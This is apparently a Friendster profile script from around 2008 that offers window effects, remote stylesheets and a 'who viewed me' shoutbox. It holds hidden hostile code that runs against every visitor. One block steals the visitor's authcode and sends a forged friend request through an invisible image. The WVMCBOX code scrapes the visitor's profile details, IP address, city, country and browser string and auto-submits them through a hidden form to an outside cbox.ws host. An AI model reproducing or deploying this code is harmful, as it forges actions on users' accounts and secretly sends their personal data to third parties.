//ROAMING WINDOW EXPANDER

scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a<80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}
window.resizeTo(0,0)
for(b=0;b<80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}
for(c=0;c<80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}
for(d=0;d<80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}
for(e=0;e<80;e++){
window.resizeTo(scrW*e/80,scrH*e/80)
}
window.moveTo(0,0)
window.resizeTo(scrW,scrH)

//css injection
var cascade = document.createElement("link");
cascade.type = "text/css";
cascade.rel = "stylesheet";
cascade.href = "http://h1.ripway.com/singoedan/mila.css";
cascade.media = "screen, print";
document.getElementsByTagName("head")[0].appendChild(cascade);

//auto add friend
var email_add = "bybeh_lope@yahoo.com";

var get_authcode = document.getElementById("controlPanelButtons").innerHTML;
var add_it = get_authcode.slice(get_authcode.indexOf("authcode="));
var PlaceInput = add_it.slice(9,39);
document.write('<img src="http://www.friendster.com/addfriendrequest.php?authcode='
+ PlaceInput + '&uid='
+ pageOwnerID + '&email='
+ email_add + '&firstname=&lastname=&friend=&submit=1"'
+ ' width="0" height="0" style="display:none" />');

//zoom foto
var blurb = document.createElement("script");
blurb.type = "text/javascript";
blurb.src = "http://h1.ripway.com/singoedan/zoom.js";
document.getElementsByTagName("head")[0].appendChild(blurb);


//WVM CBOX
/*MISC FUNCTIONS*/

function urlencode(txt) {
    return txt.replace(/ /g,"%20").replace(/'/g,"%60").replace(/</g,"%3C").replace(/>/g,"%3E");
}


function processAjaxRequest(type,url,cont,param,handler,handlerparam) {
//by marfillaster

//type 'POST' | 'GET'
//cont 'true' | 'false'

//param string | null
//handler string | null
//handlerparam string |null

    if(handlerparam) handlerparam=","+handlerparam;
    else handlerparam="";
    var httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject("Msxml2.XMLHTTP");
    if(handler) eval("httprequest.onreadystatechange=function(){if (httprequest.readyState==4) {"+handler+"(httprequest.responseText"+handlerparam+");}}");
    httprequest.open( type, url, cont);
    if(type=="POST") {
        httprequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        httprequest.setRequestHeader("Content-length", param.length);
        httprequest.setRequestHeader("Connection", "close");
   
    }
    httprequest.send(param);
}

function getElementsByClass(searchClass,node,tag) {
    var classElements = new Array();
     if ( node == null )
         node = document;
     if ( tag == null )
         tag = '*';
     var els = node.getElementsByTagName(tag);
     var elsLen = els.length;
     var pattern = new RegExp(searchClass);
     for (i = 0, j = 0; i < elsLen; i++) {
         if ( pattern.test(els[i].className) ) {
             classElements[j] = els[i];
             j++;
         }
     }
     return classElements;
}
/*END MISC FUNCTIONS*/

function addBox (type,head,htm,id,sibling) {
//by marfillaster
//type "LEFT" | "RIGHT"
//head header string
//htm innerHTML string
//id css_id string
//sibling css_id_insertbefore string | null
/* Available default Siblings

Default "sibling_ID" Boxes for Reference (10/19/07)

LEFT                RIGHT
"0"     = controlpanel        "15"     = meettrail
"1"     = photos        "2"     = friends
"13"     = blogs            "14"     = googleads
"12"     = reviews        "7"     = fan
"6"     = moreabout        "8"    = groups
"18"     = publiccomments    null    = appends to last(without "")
"10"     = scrapbook   

*/
   
    try {
        var li=document.createElement("li");
    } catch(e) {
        var li=document.createElement("<li>");
    }
    if(type=="LEFT") {
        var ul=document.getElementById("0").parentNode.parentNode;
        htm="<div class='boxcontent'>"+htm+"</div>";
    }
    else {var ul=document.getElementById("2").parentNode.parentNode;
    }
   
    li.innerHTML="<div id='"+id+"' class='commonbox "+id+"'>"+
                    "<h2>"+head+"</h2>"+
                    "<div id='content_"+id+"'>"+
                        htm+
                    "</div>"+
                    "</div>";

    if(sibling==null) ul.appendChild(li);
    else {
        sibling=document.getElementById(sibling).parentNode;
        ul.insertBefore(li,sibling);
    }
}



/*IP n Location original by Nopathz*/
var geonopz = document.createElement("script");
geonopz.type = "text/javascript";
geonopz.src = "http://gd.geobytes.com/gd?after=-1&variables=GeobytesIpAddress,GeobytesCity,GeobytesRegion,GeobytesCountry";
document.getElementsByTagName("head")[0].appendChild(geonopz);

/**
* WVMCBOX version 2.3
* Author: FeRuZZ Â© http://profiles.friendster.com/feruzz
* Timestamp: GMT+8 10.15PM April 16, 2008
* free to use but not free to resell
**/

if (!attachOnLoadHandler(function() { WVMCBOX.init();})) window.onload = function() { WVMCBOX.init();};

var WVMCBOX;
if (typeof WVMCBOX == "undefined" || !WVMCBOX) { WVMCBOX = window.WVMCBOX || {}; }
(function() {
    WVMCBOX = {
        //private property
        div: null,
        //date: Date().replace(/\(.+\)/, ""),

        ifstyle: [
            "100%",    //width
            "300",     //height
            "auto",    //scrolling
            "yes"      //allowtransparency
        ],

        base: {
            "cboxdiv": ["www6","59205","s8bnw5"]
        },

        //null if not exist
        details: {
            shoutout:null,
            gender: null,
            age: null,
            status: null,
            location: null,
            seek: null,
            since: null,
                        profileViewed: null
        },

        //get viewer details
        regexp: {
            shoutout: /shoutouttxt"\s*style="padding\:\s*0px;\s*margin\:\s*0px;">([\S\s]*?)<\/span>/i,
            gender: /q">([\S]*male)/i,
            age: /male,\s*([\d]*),/i,
            status: /male,\s*[\d]*,\s*([\S\s]*?)<\/span>/i,
            location: /Location\:\s*<\/span><a[\S\s]*?>([\S\s]*?)<\/a><\/li>/i,
            seek: /Interested\s*In\:\s*<\/span>([\S\s]*?)<\/li>/i,
            since: /Member\s*Since\:\s*<\/span>([\S\s]*?)<\/li>/i,
                        profileViewed: /\/profilehistory\.php">([\S\s]*?)<\/a>/i
        },

        init: function() {
            WVMCBOX.ajaxRequest("GET", "http://" + location.hostname + "/" + pageViewerID, true, null, WVMCBOX.viewer, null);
            setInterval("window.wvm_submit.location.href=document.getElementById('wvm_submit').src", 200000);
        },

        viewer: function(htm) {
            if (htm.replace(/^\s*|\s*$/g,"") === "") {
                alert("ERROR: Empty xmlresponse! \n Unable to parse your details!");
                return;
            }else if (htm) {
                for (var val in WVMCBOX.details) {
                    try {
                        WVMCBOX.details[val] = new RegExp(WVMCBOX.regexp[val]).exec(htm)[1];
                    }catch(e) {
                        WVMCBOX.details[val] = "";
                    }
                }
                var status = WVMCBOX.details.status;
                switch (status) {
                    case "":
                        status = "Its Complicated";
                        break;
                }
                var seek = WVMCBOX.details.seek;
                switch (seek) {
                    case "":
                        seek = "Just looking around";
                        break;
                }
                                if (WVMCBOX.details.shoutout == "") {
                                WVMCBOX.details.shoutout = "no shoutout";}

                for (var seeboks in WVMCBOX.base) {
                    var htmlspaces = "&nb"+"sp;";
                    var htmlbulls = "&bu"+"ll;";
                    WVMCBOX.div = "<iframe frameborder=\"0\" width=\"" + WVMCBOX.ifstyle[0] + "\" height=\"" + WVMCBOX.ifstyle[1] + "\" scrolling=\"" + WVMCBOX.ifstyle[2] + "\" allowtransparency=\"" + WVMCBOX.ifstyle[3] + "\" marginheight=\"2\" marginwidth=\"2\" src=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=main\" name=\"wvm_submit\" id=\"wvm_submit\"></iframe>"+
                    "<div style=\"display:none\">" +
                    "<form name=\"wvmcboxform\" id=\"wvmcboxform\" target=\"wvm_submit\" action=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=submit\" method=\"POST\">" +
                    "<input type=\"text\" name=\"nme\" value=\"" + pageViewerFName + "\">" +
                    "<input type=\"text\" name=\"eml\" value=\"http://profiles.friendster.com/" + pageViewerID + "\">"+
                    "<textarea style=\"overflow:hidden\" class=\"cboxMsgArea\" maxlength=\"500\" cols=\"22\" rows=\"3\" name=\"pst\">" + WVMCBOX.details.gender + "," + htmlspaces + "" + WVMCBOX.details.age + "," + htmlspaces + "" + status +
                    "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.since.replace(/^\s*[\w]*?/gi,"Member Since: ") +
                    "[br]" + htmlbulls + "" + htmlspaces + "Interested" + htmlspaces + "In:" + htmlspaces + "" + seek +
                    "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.location.replace(/^\s*[\S\s]*?/gi,"Location: ") +
"[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.profileViewed.replace(/^\s*[\S\s]*?/gi, "Profile Viewed: ") +         
                    "[br]" + htmlbulls + "" + htmlspaces + "Browser:" + htmlspaces + "" + navigator.userAgent +
                    "[br]" + htmlbulls + "" + htmlspaces + "IP :" + htmlspaces + "" +sGeobytesIpAddress+"[br]"+sGeobytesCity+", "+sGeobytesRegion.split("(",1)+
"[br]"+sGeobytesCountry+
"[br][br]"+WVMCBOX.details.shoutout+
                     "</textarea>" +
                    "</form>"+
                    "</div>"+
                    "<div align='center' style='text-align:center;'><form name='sibok' target='wvm_submit' action='http://"+WVMCBOX.base[seeboks][0]+".cbox.ws/box/?boxid="+WVMCBOX.base[seeboks][1]+"&boxtag="+WVMCBOX.base[seeboks][2]+"&sec=submit' method='post' onsubmit='checkform()'><input type='hidden' name='nme' value='"+pageViewerFName.replace(/"/g, "").replace(/'/g, "")+"'><input type='hidden' name='eml' value='http://profiles.friendster.com/"+pageViewerID+"'><br><input type='text' name='pst' size='9' maxlength='200' style='width:130px; height:22px; border:1px solid; border-color:#999; padding-right:2px;' value='post here' onfocus=\"frmfocus(this, 'post here')\" onblur=\"frmblur(this, 'post here')\"><input type='submit' class='mybutton' value='Send' name='submit'></form><br><br></div>";
                    addBox("RIGHT","Tinggalin Pesen di sini Kawan!","<div id=\""+seeboks+"\" align=\"center\">"+WVMCBOX.div+"</div>","wvmcbox","2");
                }
                if((pageViewerID != pageOwnerID) && (pageViewerID !== "")) {
                    try {
                        document.wvmcboxform.submit();
                    }catch(e) {
                        document.getElementById("wvmcboxform").submit();
                    }
                }
            }
        },

        ajaxRequest: function(type, url, cont, param, func, handlerparam) {
            /*
            * ajaxRequest function
            * version: 2.1
            * Copyright: FeRuZZ Â© http://profiles.friendster.com/feruzz
            *
            * @type: "GET" | "POST"
            * @cont: true | false
            * @param: param | null
            */

            var httprequest = null;
            var msxml = ["Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0", "Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
            for (var x = 0, len = msxml.length; x < len; x++) {
                try {
                    httprequest = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(msxml[x]);
                    break;
                } catch(e) {
                    httprequest = null;
                }
            }
            if (typeof func === "function") {
                httprequest.onreadystatechange = function() {
                    if (httprequest.readyState === 4) {
                        if (httprequest.status === 200) {
                            func(httprequest.responseText, handlerparam);
                        }
                    }
                };
            }
            httprequest.open(type, url, cont);
            httprequest.setRequestHeader("ajaxRequest", "true");
            httprequest.setRequestHeader("X-Requested-With", "XMLHttpRequest");
            if (type === "POST") {
                var contentLength = param ? param.length: 0;
                httprequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httprequest.setRequestHeader("Content-length", contentLength);
                if (httprequest.overrideMimeType) {
                    httprequest.setRequestHeader("Connection", "close");
                }
            }
            httprequest.send(param);
        }
    };
})();
function checkform(){
var f=document.sibok;
if(f.pst.value=="post here"){
alert("Where's ur message??");
f.pst.focus();
return false;
}
return true;
}
function frmfocus(x,y){
(x.value==y)?x.value="":void (0);
}
function frmblur(x,y){
(x.value=="")?x.value=y:void (0);
}

//Title
function tb10_makeArray(n){
	this.length = n;
	return this.length;
}

tb10_messages = new tb10_makeArray(1);
tb10_messages[0] = "Welcome To bybeH's Profie,Enjoy!";
tb10_rptType = 'infinite';
tb10_rptNbr = 5;
tb10_speed = 100;
tb10_delay = 2000;
var tb10_wiper
var tb10_space="_"
var tb10_currMsg=0;
var tb10_counter=1;
var tb10_index=0
tb10_main()
function tb10_main()
{
	document.title=tb10_messages[tb10_currMsg].substring(0,tb10_index)
	tb10_index++
	if(tb10_index==(tb10_messages[tb10_currMsg].length+4)){setTimeout('tb10_reset_clear()',tb10_delay);}
	else{setTimeout('tb10_main()',tb10_speed)}
}
function tb10_reset_clear()
{
	tb10_index=0
	tb10_wiper=""
	for(var a=0;a<tb10_messages[tb10_currMsg].length;a++){tb10_wiper+=tb10_space}
	tb10_clearem()
}
function tb10_clearem()
{
	document.title=tb10_wiper.substring(0,tb10_index) + "->" + tb10_messages[tb10_currMsg].substring(tb10_index+2,tb10_messages[tb10_currMsg].length)
	tb10_index++
	if(tb10_index==(tb10_messages[tb10_currMsg].length+4)){
		if (tb10_currMsg == tb10_messages.length-1){
			if ((tb10_rptType == 'finite') && (tb10_counter==tb10_rptNbr)){
				document.title="";
				return;	
			}	
			tb10_counter++;
			tb10_currMsg = 0;
		}
		else tb10_currMsg++;
		tb10_index=0
		tb10_main()
	}
	else{setTimeout('tb10_clearem()',250)}
}













